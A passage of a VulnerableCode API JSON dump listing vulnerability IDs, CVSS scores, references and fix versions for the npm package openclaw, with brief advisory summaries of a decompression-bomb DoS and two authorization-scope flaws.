"VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5dj5-mk23-kyds" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-66nc-bn98-nbas" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-acy1-83py-efhr" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-utv2-tyje-kfht" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vv2u-u7mn-rfe1" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24" } ], "aliases": [ "CVE-2026-35653", "GHSA-xp9r-prpg-373r" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-384t-z1h8-pfft" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89653?format=api", "vulnerability_id": "VCID-38g8-39ek-xbat", "summary": "OpenClaw: Image pixel-limit guard can fail open on sips and allow decompression-bomb DoS\n## Summary\nImage pixel-limit guard can fail open on sips and allow decompression-bomb DoS\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Shipped v2026.3.28 image processing could fail open on oversized pixel counts and allow decompression-bomb DoS, an availability issue that is valid at medium.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `0ed4f8a72bb140045962e97ab01c94c076b758a4` — 2026-03-31T22:52:55+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/0ed4f8a72bb140045962e97ab01c94c076b758a4", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/0ed4f8a72bb140045962e97ab01c94c076b758a4" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w85g-3h6x-4xh2", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w85g-3h6x-4xh2" }, { "reference_url": "https://github.com/advisories/GHSA-w85g-3h6x-4xh2", "reference_id": "GHSA-w85g-3h6x-4xh2", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w85g-3h6x-4xh2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "GHSA-w85g-3h6x-4xh2" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-38g8-39ek-xbat" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91639?format=api", "vulnerability_id": "VCID-3bdd-a9nw-13bn", "summary": "OpenClaw: Gateway HTTP /sessions/:sessionKey/kill Reaches Admin Kill Path Without Caller Scope Binding\n## Summary\n\nGateway HTTP /sessions/:sessionKey/kill Reaches Admin Kill Path Without Caller Scope Binding.\n\n## Details\n\nThe HTTP route previously treated any bearer-authenticated request as admin-eligible and could call without binding the action to requester ownership or caller-granted operator scopes. The flaw removes the bearer-token admin fallback and keeps remote session kills on the local-admin or requester-owned path only.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/02cf12371f9353a16455da01cc02e6c4ecfc4152", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/02cf12371f9353a16455da01cc02e6c4ecfc4152" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9p93-7j67-5pc2", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9p93-7j67-5pc2" }, { "reference_url": "https://github.com/advisories/GHSA-9p93-7j67-5pc2", "reference_id": "GHSA-9p93-7j67-5pc2", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9p93-7j67-5pc2" } ], "fixed_packages": [], "aliases": [ "GHSA-9p93-7j67-5pc2" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3bdd-a9nw-13bn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91121?format=api", "vulnerability_id": "VCID-3pqp-bneb-mbc4", "summary": "OpenClaw's Trusted-proxy Control UI sessions retain privileged scopes without device identity on device-less allow paths\n## Summary\nTrusted-proxy Control UI sessions without device identity could retain self-declared privileged scopes on the device-less allow path.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `ccf16cd8892402022439346ae1d23352e3707e9e`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/gateway/server/ws-connection/message-handler.ts now strips unbound self-declared scopes on the trusted-proxy no-device path.\n- src/gateway/server/ws-connection/connect-policy.ts remains the allow path, but the shipped scope scrub prevents privilege retention without device identity.\n\nOpenClaw thanks @nexrin for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/ccf16cd8892402022439346ae1d23352e3707e9e", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/ccf16cd8892402022439346ae1d23352e3707e9e" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-48vw-m3qc-wr99", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-48vw-m3qc-wr99" }, { "reference_url": "https://github.com/advisories/GHSA-48vw-m3qc-wr99", "reference_id": "GHSA-48vw-m3qc-wr99", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-48vw-m3qc-wr99" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": 